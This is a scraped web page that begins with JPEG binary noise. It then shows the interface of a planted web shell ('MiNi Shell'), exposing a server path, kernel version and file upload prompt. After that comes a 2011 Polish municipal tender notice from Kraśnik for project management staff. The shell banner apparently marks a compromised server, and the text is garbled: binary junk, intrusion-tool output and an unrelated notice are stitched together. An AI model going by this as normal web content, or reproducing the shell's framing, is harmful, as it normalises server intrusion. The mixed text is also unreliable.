JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111216/333689-N-2011.html

<p class="kh_header"><b>Kraśnik: Wybór personelu zarządzającego projektem Nowoczesne usługi - nowoczesny urzędnik</b><br>
<b>Numer ogłoszenia: 333689 - 2011; data zamieszczenia: 16.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Kraśnika , ul. Lubelska 84, 23-200 Kraśnik, woj. lubelskie, tel. 081 8251540, faks 081 8252709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krasnik.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór personelu zarządzającego projektem Nowoczesne usługi - nowoczesny urzędnik.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór personelu zarządzającego projektem Nowoczesne usługi - nowoczesny urzędnik. Projekt jest finansowany w ramach Europejskiego Funduszu Społecznego PO KL, Priorytet V. Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej. Biuro projektu będzie mieściło się w siedzibie Urzędu Miasta Kraśnik. Zamówienie jest podzielone na 3 zadania:
1.	Zadanie nr 1 - wybór kierownika projektu Nowoczesne usługi - nowoczesny urzędnik.
1)	Okres realizacji przedmiotu zamówienia - 14 m-cy.
2)	Wynagrodzenie płatne miesięcznie (80 h/mc).
3)	Obowiązki kierownika projektu:
a)	stworzenie procedur projektowych,
b)	bieżące zarządzanie projektem i nadzór nad merytoryczną i finansową realizacją projektu,
c)	sprawozdawczość rzeczowa i finansowa,
d)	kampania promocyjna,
e)	nadzór nad działaniami zmierzającymi do poprawy funkcjonowania urzędu (sformułowanie wymagań do wyboru wykonawców oraz konsultantów do działań),
f)	odpowiedzialność za poziom zrealizowania wskaźników dot. rezultatów 
i produktów (raport końcowy),
g)	koordynacja i wspieranie działań zespołu eksperckiego,
h)	planowanie w czasie, organizowanie przebiegu prac projektowych i monitoring- zgodnie z harmonogramem,
i)	praca z kierownikami urzędu przy niezbędnych decyzjach dot. prac projektowych,
j)	kontakt z MSWiA oraz ogólny nadzór nad działaniami projektu.
k)	przejęcie odpowiedzialności za całość realizacji projektu, w szczególności za zarządzanie przedsięwzięciem na wszystkich jego etapach,
l)	czuwanie nad realizacją wszystkich zadań Projektu na wszystkich jego etapach, ze szczególnym uwzględnieniem ich jakości, rzetelności i terminowości, 
m)	podejmowanie wiążących decyzji w sprawie projektu, rozliczenie projektu,
n)	kontrola całości realizacji projektu, sprawozdawczość, odpowiedzialność za przebieg działań i ich zgodność z założeniami projektu,
o)	reprezentowanie Zamawiającego w sprawach związanych z realizacją projektu wobec instytucji zewnętrznych,
p)	promocja, monitoring i ewaluacja całości projektu,
q)	uczestnictwo w przygotowywaniu wszystkich dokumentów, sprawozdań okresowych i wymaganych raportów,
r)	monitorowanie na bieżąco realizacji zadań związanych z Projektem zgodnie 
z harmonogramem ,budżetem i zapisami zawartymi we wniosku,
s)	obecność podczas kontroli Projektu,
t)	uczestnictwo w przygotowaniu i realizacji zamówień publicznych zgodnie 
z ustawą Prawo zamówień publicznych, w zakresie działań projektowych.
4)	Wymagania dotyczące kierownika projektu:
a)	wykształcenie wyższe,
b)	doświadczenie w realizacji projektów współfinansowanych/finansowanych 
ze środków zewnętrznych,
c)	dyspozycyjność w trakcie trwania projektu,
d)	znajomość obsługi komputera,
e)	posiadanie zdolności organizacyjnych,
f)	znajomość podstawowych przepisów ustawy Prawo zamówień publicznych 
i ustawy o finansach publicznych,
g)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni 
z praw publicznych,
h)	brak karalności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe,
i)	znajomość wytycznych dotyczących realizacji projektów finansowanych 
w ramach Programu Operacyjnego Kapitał Ludzki.

2.	Zadanie nr 2 - wybór asystenta projektu Nowoczesne usługi - nowoczesny urzędnik.
1)	Okres realizacji przedmiotu zamówienia - 14 m-cy.
2)	Wynagrodzenie płatne miesięcznie (50 h/mc).
3)	Obowiązki asystenta projektu:
a)	prowadzenie procesu rekrutacji,
b)	ustalenia terminów szkoleń w porozumieniu z kierownictwem, aby zapewnić ciągłość pracy UMK na odpowiednim poziomie,
c)	prawidłowość gromadzonej dokumentacji,
d)	kształtowanie pozytywnego wizerunku projektu,
e)	promocja efektów projektu oraz dbałość o spójna wizualizację wszystkich działań UMK,
f)	nadzór i organizowanie spotkań ekspertów, prace badawcze, projektowe, strategiczne w urzędzie,
g)	organizacja promocji, rekrutacji, monitoring i ewaluacja całości projektu,
h)	uczestnictwo w przygotowywaniu wszystkich wymaganych dokumentów w tym wniosków o płatność, sprawozdań okresowych i raportów,
i)	informowanie kierownika projektu na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających 
z realizacji umowy o dofinansowanie, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów,
j)	monitorowanie na bieżąco realizacji zadań związanych z projektem zgodnie 
z harmonogramem, budżetem i zapisami zawartymi we wniosku,
k)	obecność podczas kontroli projektu,
l)	uczestnictwo w przygotowaniu i realizacji zamówień publicznych zgodnie 
z ustawą Prawo zamówień publicznych, w zakresie działań projektowych.
4)	Wymagania dotyczące asystenta projektu:
a)	wykształcenie wyższe,
b)	doświadczenie w realizacji projektów współfinansowanych/finansowanych ze środków zewnętrznych,
c)	dyspozycyjność w czasie trwania projektu,
d)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni 
z praw publicznych,
e)	brak karalności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe.
f)	znajomość wytycznych dotyczących realizacji projektów finansowanych 
w ramach Programu Operacyjnego Kapitał Ludzki.

3.	Zadanie nr 3 - wybór eksperta ds. sprawozdawczości i rozliczeń projektu Nowoczesne usługi - nowoczesny urzędnik.
1)	Okres realizacji przedmiotu zamówienia - 14 m-cy.
2)	Wynagrodzenie płatne miesięcznie (125 h/mc).
3)	Obowiązki eksperta ds. sprawozdawczości i rozliczeń projektu:
a)	odpowiedzialność za ewaluację i monitoring projektu od strony finansowej,
b)	przygotowywanie wniosków o płatność,
c)	obieg dokumentów księgowych,
d)	współpraca z księgowością urzędu,
e)	rozliczanie wkładu własnego JST,
f)	rzetelne i terminowe księgowanie zdarzeń gospodarczych wynikających 
z realizacji projektu,
g)	kontrola prawidłowego wystawiania rachunków, umów cywilnoprawnych, faktur,
h)	dokonywanie płatności finansowych związanych z projektem,
i)	księgowanie dokumentów finansowych związanych z projektem,
j)	rozliczanie projektu pod względem finansowym i sprawozdawczość związana 
z projektem (wnioski o płatność, sprawozdania, itp.),
k)	prowadzenie dokumentacji finansowej,
l)	obecność podczas kontroli projektu,
m)	uczestnictwo w przygotowaniu i realizacji zamówień publicznych zgodnie 
z ustawą Prawo zamówień publicznych, w zakresie działań projektowych.
4)	Wymagania dot. eksperta ds. sprawozdawczości i rozliczeń:
a)	wykształcenie wyższe,
b)	doświadczenie w rozliczaniu projektów finansowanych/współfinansowanych                                                ze środków zewnętrznych lub doświadczenie w prowadzeniu pełnej księgowości,
c)	znajomość zasad księgowości,
d)	odpowiedzialność,
e)	komunikatywność, 
f)	znajomość podstawowych przepisów ustawy o finansach publicznych, ustawy 
o rachunkowości,
g)	znajomość wytycznych dotyczących realizacji projektów finansowanych w ramach Programu Operacyjnego Kapitał Ludzki,
h)	znajomość klasyfikacji dochodów, wydatków budżetowych,
i)	dyspozycyjność w czasie trwania projektu,
j)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni 
z praw publicznych,
k)	brak karalności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe.
4.	Wykonawca biorący udział w niniejszym postępowaniu nie może być zatrudniony jednocześnie w instytucji uczestniczącej w realizacji PO KL ( jako instytucję uczestniczącą w realizacji PO KL rozumie się Instytucję Zarządzającą, Instytucję Pośredniczącą, Instytucję Wdrażającą (Instytucję Pośredniczącą II stopnia), Regionalny Ośrodek EFS, Krajowy Ośrodek EFS oraz Krajową Instytucję Wspomagającą), chyba że nie zachodzi konflikt interesów lub podwójne finansowanie.
5.	W przypadku Wykonawców zaangażowanych w realizację zadań w więcej niż jednym projekcie, obciążenie z tego wynikające nie może wykluczać możliwości prawidłowej 
i efektywnej realizacji wszystkich zadań powierzonych danej osobie oraz osoba ta będzie prowadzić ewidencję godzin i zadań realizowanych w ramach wszystkich projektów oraz udostępni Zamawiającemu ewidencję w odniesieniu do okresu realizacji projektu Zamawiającego.
6.	W przypadku Wykonawcy będącego jednocześnie pracownikiem Zamawiającego zatrudnionym na podstawie stosunku pracy:
a)	praca wykonywana w ramach umowy cywilnoprawnej jest rodzajowo różna od pracy wykonywanej na podstawie stosunku pracy, 
b)	zaangażowanie w ramach stosunku pracy pozwala na efektywne wykonywanie zadań 
w ramach umowy cywilnoprawnej,
c)	osoba ta prowadzi ewidencję godzin pracy zaangażowanych w realizację zadań 
w ramach umowy cywilnoprawnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.21.11.00-7, 79.42.11.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dotyczącego posiadania uprawnień do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania należy przedłożyć oświadczenie stanowiące załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący posiadania wiedzy i doświadczenia oceniony zostanie na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych wykonywanych, usług w okresie ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie (załącznik nr 3 do SIWZ) - warunek zostanie uznany za spełniony, jeżeli w tych latach wykonawca wykonał/wykonuje:
a)	zadanie nr 1 - co najmniej 1 usługę polegającą na udziale w realizacji projektu współfinansowanego/finansowanego ze środków zewnętrznych, 
b)	zadanie nr 2 - co najmniej 1 usługę polegającą na udziale w realizacji projektu współfinansowanego/finansowanego ze środków zewnętrznych 
c)	zadanie nr 3 - co najmniej 1 usługę z zakresu pełnej księgowości lub co najmniej 1 usługę z zakresu rozliczania projektu współfinansowanego/finansowanego ze środków zewnętrznych
Należy załączyć dokumenty potwierdzające, że usługi zostały wykonane należycie (referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - osobami spełniającymi wymagania z rozdziału I SIWZ, oceniony zostanie na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - osobami spełniającymi wymagania z rozdziału I SIWZ, oceniony zostanie na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej oceniony zostanie na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany stawki podatku VAT zmianie ulega kwota wynagrodzenia netto, bez zmiany kwot brutto.
W przypadku przedłużenia terminu realizacji projektu przewiduje się przedłużenie okresu trwania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.krasnik.eu/index.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
pok. 321.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 11:00, miejsce: Urząd Miasta Kraśnik
ul. Lubelska 84
23-200 Kraśnik
kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 26.01.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest finansowany w ramach Europejskiego Funduszu Społecznego PO KL, Priorytet V. Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Podziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wybór kierownika projektu Nowoczesne usługi - nowoczesny urzędnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Okres realizacji przedmiotu zamówienia - 14 m-cy.
2)	Wynagrodzenie płatne miesięcznie (80 h/mc).
3)	Obowiązki kierownika projektu:
a)	stworzenie procedur projektowych,
b)	bieżące zarządzanie projektem i nadzór nad merytoryczną i finansową realizacją projektu,
c)	sprawozdawczość rzeczowa i finansowa,
d)	kampania promocyjna,
e)	nadzór nad działaniami zmierzającymi do poprawy funkcjonowania urzędu (sformułowanie wymagań do wyboru wykonawców oraz konsultantów do działań),
f)	odpowiedzialność za poziom zrealizowania wskaźników dot. rezultatów 
i produktów (raport końcowy),
g)	koordynacja i wspieranie działań zespołu eksperckiego,
h)	planowanie w czasie, organizowanie przebiegu prac projektowych i monitoring- zgodnie z harmonogramem,
i)	praca z kierownikami urzędu przy niezbędnych decyzjach dot. prac projektowych,
j)	kontakt z MSWiA oraz ogólny nadzór nad działaniami projektu.
k)	przejęcie odpowiedzialności za całość realizacji projektu, w szczególności za zarządzanie przedsięwzięciem na wszystkich jego etapach,
l)	czuwanie nad realizacją wszystkich zadań Projektu na wszystkich jego etapach, ze szczególnym uwzględnieniem ich jakości, rzetelności i terminowości, 
m)	podejmowanie wiążących decyzji w sprawie projektu, rozliczenie projektu,
n)	kontrola całości realizacji projektu, sprawozdawczość, odpowiedzialność za przebieg działań i ich zgodność z założeniami projektu,
o)	reprezentowanie Zamawiającego w sprawach związanych z realizacją projektu wobec instytucji zewnętrznych,
p)	promocja, monitoring i ewaluacja całości projektu,
q)	uczestnictwo w przygotowywaniu wszystkich dokumentów, sprawozdań okresowych i wymaganych raportów,
r)	monitorowanie na bieżąco realizacji zadań związanych z Projektem zgodnie 
z harmonogramem ,budżetem i zapisami zawartymi we wniosku,
s)	obecność podczas kontroli Projektu,
t)	uczestnictwo w przygotowaniu i realizacji zamówień publicznych zgodnie 
z ustawą Prawo zamówień publicznych, w zakresie działań projektowych.
4)	Wymagania dotyczące kierownika projektu:
a)	wykształcenie wyższe,
b)	doświadczenie w realizacji projektów współfinansowanych/finansowanych 
ze środków zewnętrznych,
c)	dyspozycyjność w trakcie trwania projektu,
d)	znajomość obsługi komputera,
e)	posiadanie zdolności organizacyjnych,
f)	znajomość podstawowych przepisów ustawy Prawo zamówień publicznych 
i ustawy o finansach publicznych,
g)	posiadanie pełnej zdolności do czynności prawnych oraz korzystanie w pełni 
z praw publicznych,
h)	brak karalności za przestępstwo popełnione umyślnie lub przestępstwo skarbowe,
i)	znajomość wytycznych dotyczących realizacji projektów finansowanych 
w ramach Programu Operacyjnego Kapitał Ludzki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 79.42.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wybór asystenta projektu Nowoczesne usługi - nowoczesny urzędnik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Okres realizacji przedmiotu zamówienia - 14 m-cy.
2)	Wynagrodzenie płatne miesięcznie (50 h/mc).
3)	Obowiązki asystenta projektu:
a)	prowadzenie procesu rekrutacji,
b)	ustalenia terminów szkoleń w porozumieniu z kierownictwem, aby zapewnić ciągłość pracy UMK na odpowiednim poziomie,
c)	prawidłowość gromadzonej dokumentacji,
d)	kształtowanie pozytywnego wizerunku projektu,
e)	promocja efektów projektu oraz dbałość o spójna wizualizację wszystkich działań UMK,
f)	nadzór i organizowanie spotkań ekspertów, prace badawcze, projektowe, strategiczne w urzędzie,
g)	organizacja promocji, rekrutacji, monitoring i ewaluacja całości projektu,
h)	uczestnictwo w przygotowywaniu wszystkich wymaganych dokumentów w tym wniosków o płatność, sprawozdań okresowych i raportów,
i)	informowanie kierownika projektu na bieżąco o wszystkich zaistniałych problemach w realizacji projektu, terminowe przesyłanie wszystkich wymaganych dokumentów i informacji, przestrzeganie obowiązków i zaleceń wynikających 
z realizacji umowy o dofinansowanie, procedur, standardów, instrukcji do sprawozdań oraz innych obowiązujących dokumentów,
j)	monitorowanie na bieżąco realizacji zadań związanych z projektem zgodnie 
z harmonogramem, budżetem i zapisami zawartymi we wniosku,
k)	obecność podczas kontroli projektu,
l)	uczestnictwo w przygotowaniu i realizacji zamówień publicznych zgodnie 
z ustawą Prawo zamówień publicznych, w zakresie działań projektowych.
4)	Wymagania dotyczące asystenta projektu:
a)	wykształcenie wyższe,
b)	doświadczenie w realizacji projektów współfinansowanych/finansowanych ze środków zewnętrznych,
